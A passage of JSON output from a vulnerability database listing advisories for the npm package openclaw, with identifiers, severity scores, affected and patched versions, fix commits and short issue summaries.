-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-
77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-
78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-xxj4-96ph-g6j6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z9a2-t66z-buga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89442?format=json","vulnerability_id":"VCID-zac2-wjyt-27af","summary":"OpenClaw: Gateway operator.write Can Reach Admin-Class Talk Voice Config Persistence via chat.send\n## Summary\nGateway operator.write Can Reach Admin-Class Talk Voice Config Persistence via chat.send\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped operator.write to admin-class Talk Voice config persistence bug, but it is the same narrow authenticated persistence class and should be normalized below high.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `e34694733fc64931ed4a543c73d84ad3435d5df1` — 2026-03-25T19:55:26Z\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zpbrent for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41379","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08343","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08336","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08354","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41379"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e34694733fc64931ed4a543c73d84ad3435d5df1","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e34694733fc64931ed4a543c73d84ad3435d5df1"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3q42-xmxv-9vfr","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3q42-xmxv-9vfr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41379","reference_id":"CVE-2026-41379","reference_type":"","scores":[],"url":"
https://nvd.nist.gov/vuln/detail/CVE-2026-41379"},{"reference_url":"https://github.com/advisories/GHSA-3q42-xmxv-9vfr","reference_id":"GHSA-3q42-xmxv-9vfr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3q42-xmxv-9vfr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"V
CID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"V
CID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"V
CID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41379","GHSA-3q42-xmxv-9vfr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zac2-wjyt-27af"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90152?format=json","vulnerability_id":"VCID-zb5t-hhkm-kfeh","summary":"OpenClaw: Host exec environment sanitization misses package, registry, Docker, compiler, and TLS override variables\n## Summary\nHost exec environment sanitization misses package, registry, Docker, compiler, and TLS override variables\n\n## Current Maintainer Triage\n- Normalized severity: medium\n- Assessment: v2026.3.28 also misses the broader package, registry, compiler, Docker, and TLS env family in the shipped host-env policy, and the unreleased main fix means this is a real medium-severity open issue.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `eb8de6715f02949c21c4e895fffc8a6dcb00975c` — 2026-03-31T19:37:43+09:00\n\nOpenClaw thanks @tdjackey for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41369","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17279","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.1724","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17276","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41369"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/eb8de6715f02949c21c4e895fffc8a6dcb00975c","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:58Z/"}],"url":"https://github.com/openclaw/openclaw/commit/eb8de6715f02949c21c4e895fffc8a6dcb00975c"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L
/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cg7q-fg22-4g98","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:58Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cg7q-fg22-4g98"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-sanitization-in-host-execution","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:58Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-sanitization-in-host-execution"},{"reference_url":"https://github.com/advisories/GHSA-cg7q-fg22-4g98","reference_id":"GHSA-cg7q-fg22-4g98","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cg7q-fg22-4g98"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907
?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"
VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"h
ttp://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41369","GHSA-cg7q-fg22-4g98"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zb5t-hhkm-kfeh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50659?format=json","vulnerability_id":"VCID-zda4-uuw4-fkhp","summary":"OpenClaw: Node camera URL payload host-binding bypass allowed gateway fetch pivots\nOpenClaw accepted `camera.snap` / `camera.clip` node payload `url` fields and downloaded them on the gateway/agent host without binding downloads to the resolved node host.\n\nIn OpenClaw's documented trust model, paired nodes are in the same operator trust boundary, so this is scoped as medium-severity hardening. A malicious or compromised paired node could still steer gateway-host fetches during camera URL retrieval.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3bf19d6f40a0aaa55818b96eede3d05130c02533","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/3bf19d6f40a0aaa55818b96eede3d05130c02533"},{"reference_url":"https://github.com/advisories/GHSA-2858-xg23-26fp","reference_id":"GHSA-2858-xg23-26fp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2858-xg23-26fp"},{"reference_url":"https://g
